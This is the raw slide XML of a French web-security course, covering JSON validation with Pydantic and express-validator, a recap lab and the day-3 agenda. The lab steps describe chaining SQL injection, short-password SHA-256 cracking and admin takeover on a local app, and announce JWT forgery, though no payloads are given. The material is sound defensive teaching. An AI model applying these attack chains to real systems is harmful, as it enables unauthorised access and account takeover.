              </a:rPr>
              <a:t>express-validator  ·  checkSchema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1261872"/>
            <a:ext cx="10058400" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Pydantic  ·  Fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1463039"/>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005840" y="1463039"/>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325880" y="1499616"/>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Optional</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="1719072"/>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champ peut manquer. tags absent : OK.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2359152"/>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1005840" y="2359152"/>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325880" y="239572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Nullable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="261518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champ peut être null. mentor: null : OK.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3255264"/>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05840" y="3255264"/>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325880" y="329184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Whitelist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="351129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On nomme ce qui entre. Un champ inconnu : non.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4169663"/>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Blacklist (« tout sauf role ») : le prochain champ passera. C’est le spread d’avant.</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optional</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Absent, ou null. Ce n’est pas la même chose.</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Express  ·  checkSchema</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tags:    { optional: true, isArray: true },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mentor:  { optional: { options: { nullable: true } }, isString: true },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// tags absent → OK. tags: null → non.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// mentor absent ou null → OK.</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Flask  ·  Pydantic</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tags: list[str] | None = None          # absent → None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mentor: str | None = None              # absent ou null → None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># tags: None est accepté ici. Pour l'interdire : un validator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Optional = peut manquer. Nullable = peut être JSON null. Lisez le contrat à droite du lab.</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whitelist</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Whitelist. Pas une blacklist.</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Express  ·  matchedData = whitelist</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const data = matchedData(req);   // seulement les champs du schéma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>users.push({ id, role: "user", ...data });  // plus de request.body</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Flask  ·  extra='forbid'</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class Brief(BaseModel):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    model_config = ConfigDict(extra="forbid")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    title: str</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # role: dans le JSON → ValidationError</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # extra="ignore" = on ferme les yeux. Mauvaise idée ici.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Blacklist : interdire role, recopier le reste. Le champ isAdmin arrivera demain. Nommez. N’excluez pas.</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poser un schéma Pydantic et un checkSchema</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que valider ne remplace pas paramétrer, ni refuser eval</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353312" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation JSON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poser un schéma Pydantic et un checkSchema</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Des champs, des types, une longueur. Le client n’invente pas le contrat.</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que valider ne remplace pas paramétrer, ni refuser eval</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Le schéma coupe le bruit. La serrure, c’est de ne pas exécuter l’entrée.</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Recap après-midi</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104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04</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Un scénario. Toute la journée.</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après-midi  ·  Flask ou Express  ·  http://127.0.0.1:8041/</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Recap après-midi</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s4_recap</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Recherche fragile. SHA-256. Un rôle admin.</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day-2/s4_recap. Même page, deux backends, une SQLite. 127.0.0.1 seulement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Aucun payload, aucun mot de passe admin dans le README. Le code de la journée suffit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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day-2/s4_recap  ·  README d’abord</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="d2s4-recap-brief.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871336" y="1828800"/>
            <a:ext cx="6418847" cy="3547872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>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student / class101. Quatre preuves. On ne touche pas la base à la main.</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Recap après-midi</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04 · mission</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Quatre preuves. Dans l’ordre.</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1. Les users, les empreintes</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Liste des comptes et leurs SHA-256. La recherche est volontairement fragile.</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2. Une petite table locale</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Alphabet a-z A-Z 0-9, longueur max 4. Pas un GPU. On s’arrête dès que ça matche.</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3. Une session admin</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mot de passe retrouvé. Login. Le rôle, c’est le serveur qui le dit.</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4. Cinq services stopped</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Les boutons du tableau. Un user ne suffit pas. Le contrôle est côté serveur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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On ne modifie pas seed.sql. On ne patch pas le serveur. On passe par l’app.</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Recap après-midi</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04 · borne</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4 caractères. Pas un GPU.</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62⁴ tient dans un après-midi. 62¹⁰, non.</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62^1 + … + 62^4   ≈   1,5 × 10^7     # quelques secondes, à la volée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>62^1 + … + 62^10  ≈   8,53 × 10^17    # absurde. Pas de couche GPU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Alphabet a-z A-Z 0-9. Longueur max 4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># On parcourt, on hashe, on compare. On n'écrit pas la table sur disque.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># On s'arrête dès que l'empreinte cible apparaît.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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SHA-256 seul, mot court, pas de sel : cède. C’était le lab B du jour 1. Ici, 4 caractères, point.</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Recap après-midi</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s4_recap</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Lancer. Lire le README. Ne pas coller un payload tout fait.</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day-2/s4_recap</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day-2/s4_recap</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Flask ou Express. Pas les deux sur le même sqlite.</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http://127.0.0.1:8041/  ·  student / class101</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Reset : supprimer db/lab.sqlite3, relancer. seed.sql recrée tout.</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Quatre preuves. README ouvert. Aucune solution dans le dépôt.</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Lire README.md. Choisir Flask ou Express. Lancer. Ouvrir :8041.</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Login student / class101. Observer la recherche. Extraire les empreintes.</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Table locale, max 4 caractères, early-stop. Login admin. Stopper les cinq services.</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Recap après-midi</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109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04 · bilan</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À expliquer, à voix haute</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La requête paramétrée</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Elle aurait coupé l’étape 1. L’apostrophe serait restée une apostrophe.</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SHA-256 seul</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Trop rapide, pas de sel. Un mot court tombe. argon2id, c’était le matin du jour 1.</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Les boutons cachés</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Masquer dans le HTML ne remplace pas role == admin sur le serveur.</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La validation</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Même après le SQL : un schéma. Le client n’invente pas le contrat.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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Demain : le jeton, le propriétaire, les headers.</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2</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437436" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Recap après-midi</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Ce que vous savez faire ce soir</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Sans notes, à voix haute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fermer une chaîne SQL avec une apostrophe, puis paramétrer</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faire exécuter une note PHP sur Easy Clipboard, puis ranger les secrets</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valider un JSON, puis enchaîner SQLi + hash + rôle dans un seul scénario</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111 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cover-hero-day2-1296x1236.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263640" y="457200"/>
            <a:ext cx="5925312" cy="5650992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="457200"/>
            <a:ext cx="5806440"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1965960"/>
            <a:ext cx="5029200" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JOUR  3  ·  jeton, ownership, hygiène</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2377440"/>
            <a:ext cx="5029200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JWT, IDOR, CORS, hygiène</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3931920"/>
            <a:ext cx="5029200" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On falsifie un jeton. On exige le propriétaire. On range les headers et les secrets.</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112 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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585216"/>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JOUR  3  ·  AU PROGRAMME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce que nous discutons aujourd’hui</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1335024"/>
            <a:ext cx="101498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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1536192"/>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4" name="TextBox 13">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="1554480"/>
            <a:ext cx="6949440" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JWT  ·  falsifier, puis vérifier la signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="1572768"/>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2 h 30 · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1956816"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2286000"/>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18" name="TextBox 17">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="2304288"/>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IDOR  ·  middleware Flask et Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="2322576"/>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2 h · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2706624"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3035808"/>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2" name="TextBox 21">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="3054096"/>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CORS, secrets, headers, logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="3072384"/>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2 h · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3456432"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3785615"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="3803903"/>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Bilan du jour</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="3822191"/>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20 min</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113 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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Lexique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>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Les mots de cette section, sans jargon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
